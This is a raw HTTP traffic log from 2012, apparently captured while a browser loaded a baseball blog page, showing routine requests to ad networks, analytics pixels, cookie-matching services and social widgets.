Referer: http://www.facebook.com/plugins/like.php?api_key=&amp;locale=en_US&amp;sdk=joey&amp;channel_url=http%3A%2F%2Fstatic.ak.facebook.com%2Fconnect%2Fxd_arbiter.php%3Fversion%3D17%23cb%3Df5a4e152d64ce6%26origin%3Dhttp%253A%252F%252Ffenwaywest.com%252Ff16e45e0fb359%26domain%3Dfenwaywest.com%26relation%3Dparent.parent&amp;href=http%3A%2F%2Fwww.fenwaywest.com%2Fsh404sef-custom-content%2F404.html&amp;node_type=link&amp;width=90&amp;font=arial&amp;layout=button_count&amp;colorscheme=light&amp;action=like&amp;show_faces=false&amp;send=false&amp;extended_social_context=false
Origin: http://www.facebook.com
HTTP/1.1 200 OK

Content-Type: application/x-javascript; charset=utf-8
Access-Control-Allow-Origin: *
Last-Modified: Sat, 17 Nov 2012 00:17:41 GMT
X-Content-Type-Options: nosniff
Content-Encoding: gzip
X-FB-Debug: AT2bGKOZYGuklXy64jVJve2R06/vXFDzLhORF14o8Qw=
Content-Length: 37570
Vary: Accept-Encoding
Cache-Control: public, max-age=31446318
Expires: Sun, 17 Nov 2013 00:36:05 GMT
Date: Sun, 18 Nov 2012 01:30:47 GMT
Connection: keep-alive
GET /user/browser?p=b2108357999e9462&r=1 HTTP/1.1

Host: user.lucidmedia.com
GET /user/browser?p=b2108357999e9462&amp;r=1 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://bh.contextweb.com/bh/visitormatch?tag=66902&amp;pid=520266
HTTP/1.1 302 Moved Temporarily

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
Cache-Control: no-cache, no-store
Pragma: no-cache
Date: Sun, 18 Nov 2012 01:30:47 GMT
Expires: Sun, 18 Nov 2012 01:30:47 GMT
P3P: CP=&quot;NOI ADM DEV CUR&quot;
X-Handled-By: awserh14/127.0.0.1
Set-Cookie: lm_userid=3gF8uXCO415; Domain=.lucidmedia.com; Expires=Mon, 18-Nov-2013 01:30:47 GMT; Path=/
Location: http://bh.contextweb.com/bh/rtset?do=add&amp;pid=543604&amp;ev=4256222330766245957
Content-Length: 0
Connection: close
GET /merge?3pid=f45883da-a5b2-4229-92e5-ccb518d47872&pid=11 HTTP/1.1

Host: ce.lijit.com
GET /merge?3pid=f45883da-a5b2-4229-92e5-ccb518d47872&amp;pid=11 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://gslbeacon.lijit.com/beacon?viewId=135320224335022b7e1619fcd&amp;rand=1353202243350&amp;uri=http://www.lijit.com/users/bloguin/1&amp;informer=6280786&amp;type=fpads&amp;loc=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&amp;ifr=1&amp;v=1.0&amp;rr=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php
Cookie: ljt_reader=ef7a042fe53a26bce537c3d018177452; ljtrtb=eJwNybsNwDAIBcBdqINkPobnbIOwskSU3ePmmntJ6CZLwNWhmaoWA2vSRXZmjoKVPQz1Zl%2BHihbGVoHPRqTR9wMabw%2Fm
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Sun, 18 Nov 2012 01:30:47 GMT
Server: Apache/2.2.22 (Ubuntu)
X-Powered-By: PHP/5.3.10-1ubuntu3.4
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache, max-age=86400, must-revalidate
P3P: CP=&quot;CUR ADM OUR NOR STA NID&quot;
Set-Cookie: ljtrtb=eJwVjMENwzAMxHbROwLik2Sdu40jJ0sU3T3uhx8S%2FEqTj1iSDicyAesnR8ghtk2ckzbtUcJLfWzMXk250OhR7Gk7bf%2FL40HamjrjgjowdOAOrbqicXkyIb8XsC0aVw%3D%3D; expires=Mon, 18-Nov-2013 01:30:47 GMT; path=/; domain=.lijit.com
Content-Length: 43
Expires: Mon, 19 Nov 2012 01:30:47 GMT
Connection: close
GET /p?c1=8&c2=3005693&c3=13&c4=&c5=&c6=&c15=&cv=2.0&cj=1&ljt_r=705247426 HTTP/1.1

Host: b.scorecardresearch.com
GET /p?c1=8&amp;c2=3005693&amp;c3=13&amp;c4=&amp;c5=&amp;c6=&amp;c15=&amp;cv=2.0&amp;cj=1&amp;ljt_r=705247426 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://akamai-media.contextweb.com/creatives/BackupTags/520266/15c83429-2270-477c-9adf-69374f516793Lijit_Leader..html
Cookie: UID=546eda-195.159.219.9-1353202238; UIDR=1353202238
HTTP/1.1 200 OK

Content-Type: image/gif
Content-Length: 43
Date: Sun, 18 Nov 2012 01:30:47 GMT
Connection: keep-alive
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
GET /adfserve/?bn=1329957;rtbpid=3;rtbinv=3;rtbwp=5.107999-zZCw86LB5ZC7lunZ-RHvo7TOhmYLyqZV7cWy01SvO8c1;rtbr=4741703287657975831;rtbcid=paebqcWa9Kg4ukszB6hDMjPkTESS5L7Q0;rtbtpc=cHdjYo81GdgVFcFHG1iKLKbyqSb8bzB30;rtburl=http%3A%2F%2Fad.yieldmanager.com%2Fiframe3%3FdxpuAHsxGQB3lnwAAAAAAG7KHwAAAAAAAgAAAAIAAAAAAP8AAAABA3hSEwAAAAAA29spAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC8ixAAAAAAAAIAAgAAgD8AmpmZmZmZ2T-amZmZmZnZP5qZmZmZmdk.mpmZmZmZ2T8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADY-vfQxR7xDPXnj5BLDnflYYsORV7SrsrBxeAnAAAAAA%3D%3D%2C%2Chttp%253A%252F%252Ffenwaywest.com%252Fmedia%252Findex.php%2CZ%253D300x250%2526_salt%253D420036788%2526anmember%253D514%2526anprice%253D100%2526r%253D0%2526s%253D1651067%2C92efcc18-311f-11e2-a19f-73f8a8b88e6f%2C1353202245347;rtbcat=;js=1;adfxid=1x;10195;set=en-US|en-US|1176X885|10|300|250|24|9|3|7|1&CREFURL=http%3a%2f%2fib.adnxs.com%2fif%3fenc%3dl_PMSpduFECX88xKl24UQAAAAAAAAPA_nVPGf38WIUCdU8Z_fxYhQBfQJ3sE6s1BoArzhH1cTlFGOqhQAAAAAHwJDgAYAQAA5wUAAFsAAAD_QjsAqZECAAAAAQBVU0QAVVNEACwB-gDaJQAAzhcAAgUCAQUAAIQAM HTTP/1.1

Host: server.adformdsp.net
GET /adfserve/?bn=1329957;rtbpid=3;rtbinv=3;rtbwp=5.107999-zZCw86LB5ZC7lunZ-RHvo7TOhmYLyqZV7cWy01SvO8c1;rtbr=4741703287657975831;rtbcid=paebqcWa9Kg4ukszB6hDMjPkTESS5L7Q0;rtbtpc=cHdjYo81GdgVFcFHG1iKLKbyqSb8bzB30;rtburl=http%3A%2F%2Fad.yieldmanager.com%2Fiframe3%3FdxpuAHsxGQB3lnwAAAAAAG7KHwAAAAAAAgAAAAIAAAAAAP8AAAABA3hSEwAAAAAA29spAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC8ixAAAAAAAAIAAgAAgD8AmpmZmZmZ2T-amZmZmZnZP5qZmZmZmdk.mpmZmZmZ2T8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADY-vfQxR7xDPXnj5BLDnflYYsORV7SrsrBxeAnAAAAAA%3D%3D%2C%2Chttp%253A%252F%252Ffenwaywest.com%252Fmedia%252Findex.php%2CZ%253D300x250%2526_salt%253D420036788%2526anmember%253D514%2526anprice%253D100%2526r%253D0%2526s%253D1651067%2C92efcc18-311f-11e2-a19f-73f8a8b88e6f%2C1353202245347;rtbcat=;js=1;adfxid=1x;10195;set=en-US|en-US|1176X885|10|300|250|24|9|3|7|1&amp;CREFURL=http%3a%2f%2fib.adnxs.com%2fif%3fenc%3dl_PMSpduFECX88xKl24UQAAAAAAAAPA_nVPGf38WIUCdU8Z_fxYhQBfQJ3sE6s1BoArzhH1cTlFGOqhQAAAAAHwJDgAYAQAA5wUAAFsAAAD_QjsAqZECAAAAAQBVU0QAVVNEACwB-gDaJQAAzhcAAgUCAQUAAIQAM HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://ib.adnxs.com/if?enc=l_PMSpduFECX88xKl24UQAAAAAAAAPA_nVPGf38WIUCdU8Z_fxYhQBfQJ3sE6s1BoArzhH1cTlFGOqhQAAAAAHwJDgAYAQAA5wUAAFsAAAD_QjsAqZECAAAAAQBVU0QAVVNEACwB-gDaJQAAzhcAAgUCAQUAAIQAMCLWxwAAAAA.&amp;pubclick=http://network.realmedia.com/RealMedia/ads/click_lx.ads/bloguin/ros/300x250/sx/ss/a/L7/124112090/x15/USNetwork/MAX_US_GeneralInterest_Tier03_300x250_MAX_Campaign/max_tag.html/77352b4d336c436f4f6b594142396245?&amp;vpid=1&amp;referrer=http%3A%2F%2Fad.yieldmanager.com%2Fiframe3%3FdxpuAHsxGQB3lnwAAAAAAG7KHwAAAAAAAgAAAAIAAAAAAP8AAAABA3hSEwAAAAAA29spAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC8ixAAAAAAAAIAAgAAgD8AmpmZmZmZ2T-amZmZmZnZP5qZmZmZmdk.mpmZmZmZ2T8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADY-vfQxR7xDPXnj5BLDnflYYsORV7SrsrBxeAnAAAAAA%3D%3D%2C%2Chttp%253A%252F%252Ffenwaywest.com%252Fmedia%252Findex.php%2CZ%253D300x250%2526_salt%253D420036788%2526anmember%253D514%2526anprice%253D100%2526r%253D0%2526s%253D1651067%2C92efcc18-311f-11e2-a19f-73f8a8b88e6f%2C1353202245347&amp;custom_macro=ENC_CPM%5EzZCw86LB5ZC7lunZ-RHvo7TOhmYLyqZV7cWy01SvO8c1%5EENC_CID%5EpaebqcWa9Kg4ukszB6hDMjPkTESS5L7Q0%5EENC_TPC%5EcHdjYo81GdgVFcFHG1iKLKbyqSb8bzB30%5EINV_SRC%5E3%5EIAB_CATS%5E&amp;media_subtypes=1&amp;dlo=1
Cookie: cid=5764607523038943412,0,0,0,0; uid=5764607523038943412; C=1
HTTP/1.1 200 OK

Content-Type: text/javascript; charset=iso-8859-1
Cache-Control: no-cache, no-store, must-revalidate
Date: Sun, 18 Nov 2012 01:30:48 GMT
Pragma: no-cache
Expires: -1
Server: Microsoft-IIS/6.0
P3P: CP=&quot;NOI DSP COR NID CURa ADMa DEVa TAIa PSAa PSDa OUR LEG NAV INT&quot;
Access-Control-Allow-Origin: *
Set-Cookie: cid=5764607523038943412,0,0,0,0; expires=Thu, 17-Jan-2013 01:30:48 GMT; path=/ uid=5764607523038943412; domain=adformdsp.net; expires=Thu, 17-Jan-2013 01:30:48 GMT; path=/ OrderId1981508=-1; expires=Mon, 19-Nov-2012 01:30:48 GMT; path=/ Imps1981508=0; expires=Mon, 19-Nov-2012 01:30:48 GMT; path=/ DailyImps1981508=0; expires=Mon, 19-Nov-2012 01:30:48 GMT; path=/ Clks1981508=0; expires=Mon, 19-Nov-2012 01:30:48 GMT; path=/ DailyClks1981508=0; expires=Mon, 19-Nov-2012 01:30:48 GMT; path=/ LastDate1981508=2012-11-18 02:30:48; expires=Mon, 19-Nov-2012 01:30:48 GMT; path=/
Content-Encoding: gzip
Vary: Accept-Encoding
Transfer-Encoding: chunked
GET /pixel/p-56WJ0KtIxWJ_2.gif?r=0.5211754413654688 HTTP/1.1

Host: pixel.quantserve.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://akamai-media.contextweb.com/creatives/BackupTags/520266/15c83429-2270-477c-9adf-69374f516793Lijit_Leader..html
Cookie: mc=50a83a3c-b2d37-9dbcd-25149
HTTP/1.1 200 OK

Content-Type: image/gif
Connection: close
Cache-Control: private, no-cache, no-store, proxy-revalidate
Pragma: no-cache
Expires: Fri, 04 Aug 1978 12:00:00 GMT
Content-Length: 35
Date: Sun, 18 Nov 2012 01:30:47 GMT
Server: QS
GET /pixel?google_nid=contextweb&google_cm&google_sc HTTP/1.1

Host: cm.g.doubleclick.net
GET /pixel?google_nid=contextweb&amp;google_cm&amp;google_sc HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://bh.contextweb.com/bh/visitormatch?tag=66902&amp;pid=520266
Cookie: id=223ae1776901005b||t=1350343758|et=730|cs=002213fd480aa30e9cef2f5d42
HTTP/1.1 302 Found

Content-Type: text/html; charset=UTF-8
Location: http://bh.contextweb.com/bh/rtset?do=add&amp;pid=547259&amp;ev=CAESEKYS_yt-_5f3x4i1G1qPWZQ&amp;google_cver=1
Date: Sun, 18 Nov 2012 01:30:47 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Server: Cookie Matcher
Content-Length: 305
X-XSS-Protection: 1; mode=block
GET /navigation/images/rss.png HTTP/1.1

Host: www.bloguinmedia.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.bloguinmedia.com/navigation/css/main.css
HTTP/1.1 200 OK

Content-Type: image/png
Date: Sun, 18 Nov 2012 01:30:47 GMT
Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/1.0.0-fips mod_bwlimited/1.4
Last-Modified: Fri, 21 Sep 2012 01:10:16 GMT
Etag: &quot;226b8e-810-4ca2be7128e00&quot;
Accept-Ranges: bytes
Content-Length: 2064
Keep-Alive: timeout=5, max=496
Connection: Keep-Alive
GET /navigation/images/close-btn.png HTTP/1.1

Host: www.bloguinmedia.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 200 OK

Content-Type: image/png
Date: Sun, 18 Nov 2012 01:30:47 GMT
Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/1.0.0-fips mod_bwlimited/1.4
Last-Modified: Fri, 21 Sep 2012 01:10:14 GMT
Etag: &quot;226b7a-448-4ca2be6f40980&quot;
Accept-Ranges: bytes
Content-Length: 1096
Keep-Alive: timeout=5, max=496
Connection: Keep-Alive
GET /navigation/images/newsletter0.png HTTP/1.1

Host: www.bloguinmedia.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.bloguinmedia.com/navigation/css/main.css
HTTP/1.1 200 OK

Content-Type: image/png
Date: Sun, 18 Nov 2012 01:30:47 GMT
Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/1.0.0-fips mod_bwlimited/1.4
Last-Modified: Fri, 21 Sep 2012 01:10:16 GMT
Etag: &quot;226b8b-107-4ca2be7128e00&quot;
Accept-Ranges: bytes
Content-Length: 263
Keep-Alive: timeout=5, max=497
Connection: Keep-Alive
GET /match?p=11 HTTP/1.1

Host: match.rtbidder.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://bh.contextweb.com/bh/visitormatch?tag=66902&amp;pid=520266
Cookie: bsuid=%3EtLIHZe%21%3A%28BRn%23%28
HTTP/1.1 302 Moved Temporarily

Content-Type: text/plain
Server: rtbidder
Date: Sun, 18 Nov 2012 01:30:48 GMT
Content-Length: 267
P3P: policyref=&quot;http://match.rtbidder.net/p3p.xml&quot;, CP=&quot;NOI DSP COR CURa ADMa DEVa TAIo PSAo PSDo IVAo IVDo CONo HISa TELo OUR STP&quot;
Pragma: no-cache
Set-Cookie: bsuid=%3EtLIHZe%21%3A%28BRn%23%28; path=/; domain=.rtbidder.net; expires=Sat, 16-Feb-2013 01:30:48 GMT
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Cache-Control: no-store, no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Location: http://bh.contextweb.com/bh/rtset?do=add&amp;pid=535393&amp;ev=50a83a45a735dc4b5be8a818
GET /?y=3&t=h&u=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&r=http%3A%2F%2Fwww.shinynylonarts.com%2F HTTP/1.1

Host: dg.specificclick.net
GET /?y=3&amp;t=h&amp;u=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&amp;r=http%3A%2F%2Fwww.shinynylonarts.com%2F HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 200 OK

Content-Type: text/html;charset=ISO-8859-1
Server: WebStar 1.0
Set-Cookie: ug=Av-AqKasWdq7lD; Domain=.specificclick.net; Expires=Fri, 17-Nov-2017 01:30:47 GMT; Path=/
P3P: CP=&quot;NOI DSP COR DEVa TAIa OUR BUS UNI NAV&quot;
Cache-Control: no-store,no-cache,must-revalidate,post-check=0,pre-check=0
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Transfer-Encoding: chunked
Date: Sun, 18 Nov 2012 01:30:47 GMT
GET /meter.asp?site=s27fenwaywest&refer=http%3A//www.shinynylonarts.com/&ip=195.159.140.222&w=1176&h=885&clr=24&tzo=-60&lang=en-US&pg=http%3A//fenwaywest.com/media/index.php&js=1&rnd=0.3827459020866242&zyxver=1.120524 HTTP/1.1

Host: b27.sitemeter.com
GET /meter.asp?site=s27fenwaywest&amp;refer=http%3A//www.shinynylonarts.com/&amp;ip=195.159.140.222&amp;w=1176&amp;h=885&amp;clr=24&amp;tzo=-60&amp;lang=en-US&amp;pg=http%3A//fenwaywest.com/media/index.php&amp;js=1&amp;rnd=0.3827459020866242&amp;zyxver=1.120524 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 200 OK

Content-Type: image/gif
Connection: close
Date: Sun, 18 Nov 2012 01:33:35 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 669
Cache-Control: private
GET /meter.asp?site=s52bloguinbaseball&refer=http%3A//www.shinynylonarts.com/&ip=195.159.140.222&w=1176&h=885&clr=24&tzo=-60&lang=en-US&pg=http%3A//fenwaywest.com/media/index.php&js=1&rnd=0.9304050916620044&zyxver=1.120524 HTTP/1.1

Host: b21.sitemeter.com
GET /meter.asp?site=s52bloguinbaseball&amp;refer=http%3A//www.shinynylonarts.com/&amp;ip=195.159.140.222&amp;w=1176&amp;h=885&amp;clr=24&amp;tzo=-60&amp;lang=en-US&amp;pg=http%3A//fenwaywest.com/media/index.php&amp;js=1&amp;rnd=0.9304050916620044&amp;zyxver=1.120524 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 200 OK

Content-Type: image/gif
Connection: close
Date: Sun, 18 Nov 2012 01:34:03 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 669
Cache-Control: private
GET /00/72/26/uat_2672.js?ad_size=160x600 HTTP/1.1

Host: ad-cdn.technoratimedia.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://r1.ace.advertising.com/ctst=1/site=782471/size=160600/u=2/bnum=85478879/wkhr=2/hr=2/hl=1/scres=5/swh=1176x885/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/tags=1/dref=http%253A%252F%252Fakamai-media.contextweb.com%252Fcreatives%252FBackupTags%252F520266%252F00259a8d-0f3c-4e40-8e92-68482cb19d04Lijit_Scraper..html
HTTP/1.1 200 OK

Content-Type: text/javascript
Content-Encoding: gzip
_ontent-Length: 9706
Accept-Ranges: bytes
Date: Sun, 18 Nov 2012 01:30:48 GMT
Etag: &quot;142a1d-25ea-4cbe3a3f0e932&quot;
Last-Modified: Fri, 12 Oct 2012 21:47:55 GMT
Server: ECS (arn/46E5)
Vary: Accept-Encoding
X-Cache: HIT
X-Via: CN-5000
Content-Length: 3727
GET /1/urls/count.json?url=http%3A%2F%2Fwww.fenwaywest.com%2Fsh404sef-custom-content%2F404.html&callback=twttr.receiveCount HTTP/1.1

Host: cdn.api.twitter.com
GET /1/urls/count.json?url=http%3A%2F%2Fwww.fenwaywest.com%2Fsh404sef-custom-content%2F404.html&amp;callback=twttr.receiveCount HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://platform.twitter.com/widgets/tweet_button.1352365724.html
HTTP/1.1 200 OK

Content-Type: application/javascript;charset=utf-8
Last-Modified: Sun, 18 Nov 2012 01:30:48 GMT
Content-Encoding: gzip
Content-Length: 122
Server: tfe
Vary: Accept-Encoding
Cache-Control: must-revalidate, max-age=851
Expires: Sun, 18 Nov 2012 01:44:59 GMT
Date: Sun, 18 Nov 2012 01:30:48 GMT
Connection: keep-alive
GET /b?c1=8&c2=2101&c3=1234567891234567891&ns__t=1353202248148&ns_c=ISO-8859-1&c8=&c7=http%3A%2F%2Fdg.specificclick.net%2F%3Fy%3D3%26t%3Dh%26u%3Dhttp%253A%252F%252Ffenwaywest.com%252Fmedia%252Findex.php%26r%3Dhttp%253A%252F%252Fwww.shinynylonarts.com%252F&c9=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php HTTP/1.1

Host: b.scorecardresearch.com
GET /b?c1=8&amp;c2=2101&amp;c3=1234567891234567891&amp;ns__t=1353202248148&amp;ns_c=ISO-8859-1&amp;c8=&amp;c7=http%3A%2F%2Fdg.specificclick.net%2F%3Fy%3D3%26t%3Dh%26u%3Dhttp%253A%252F%252Ffenwaywest.com%252Fmedia%252Findex.php%26r%3Dhttp%253A%252F%252Fwww.shinynylonarts.com%252F&amp;c9=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://dg.specificclick.net/?y=3&amp;t=h&amp;u=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&amp;r=http%3A%2F%2Fwww.shinynylonarts.com%2F
Cookie: UID=546eda-195.159.219.9-1353202238; UIDR=1353202238
HTTP/1.1 204 No Content

HTTP/1.1 204 No Content
Content-Length: 0
Date: Sun, 18 Nov 2012 01:30:48 GMT
Connection: keep-alive
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
GET /t.gif?_=1353202247332&count=horizontal&id=twitter-widget-1&lang=en&original_referer=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&size=m&text=__404__&url=http%3A%2F%2Fwww.fenwaywest.com%2Fsh404sef-custom-content%2F404.html&via=FenwayWest&type=share&twttr_referrer=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&twttr_widget=1&twttr_hask=0&twttr_li=0&twttr_pid= HTTP/1.1

Host: p.twitter.com
GET /t.gif?_=1353202247332&amp;count=horizontal&amp;id=twitter-widget-1&amp;lang=en&amp;original_referer=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&amp;size=m&amp;text=__404__&amp;url=http%3A%2F%2Fwww.fenwaywest.com%2Fsh404sef-custom-content%2F404.html&amp;via=FenwayWest&amp;type=share&amp;twttr_referrer=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&amp;twttr_widget=1&amp;twttr_hask=0&amp;twttr_li=0&amp;twttr_pid= HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://platform.twitter.com/widgets/tweet_button.1352365724.html
HTTP/1.1 200 OK

Content-Type: image/gif
Etag: &quot;377d257f2d2e294916143c069141c1c5:1328738114&quot;
Last-Modified: Wed, 08 Feb 2012 21:55:14 GMT
Accept-Ranges: bytes
Content-Length: 43
Cache-Control: no-cache
P3P: CP=&quot;CAO DSP LAW CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV INT&quot;
Date: Sun, 18 Nov 2012 01:30:48 GMT
Connection: keep-alive
GET /Banners/scripts/rmb/Adform.RMB.js?version=1-28 HTTP/1.1

Host: s1.adformdsp.net

